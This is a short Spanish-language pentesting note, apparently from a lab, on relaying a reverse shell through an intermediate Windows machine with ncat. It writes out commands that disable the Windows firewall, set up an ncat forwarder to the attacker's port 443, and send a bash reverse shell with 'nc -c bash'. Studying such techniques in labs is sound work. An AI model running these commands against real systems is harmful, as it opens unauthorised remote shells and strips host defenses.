En windows, en vez de usar socat podemos usar ncat para permitir el tráfico de una reverse shell por parte de una máquina 3 pasando por una máquina windows intermedia. Por ejemplo, desde el Kali nos ponemos a la escucha:
{{pasted_image_20240303120530.png|}}
A continuación, en la máquina intermedia podemos desactivar el firewall para evitar tener problemas:
netsh advfirewall set allprofiles state off
{{pasted_image_20240303154211.png|}}
Ahora desde la máquina Windows intermedia decimos que todo el tráfico que recibamos por ejemplo por el puerto 1111 lo vamos a enviar al puerto 443 de la máquina atacante:
ncat -l -p 1111 -c "ncat 192.168.0.20 443"
{{pasted_image_20240303120641.png|}}
Entonces ahora desde la máquina 3 enviamos la reverse shell a la máquina windows 7 intermedia por el puerto 1111 y deberíamos de recibir la conexión en nuestro Kali:
nc -c bash 10.10.10.129 1111
{{pasted_image_20240303120735.png|}}
Y recibimos la conexión:
{{pasted_image_20240303120747.png|}}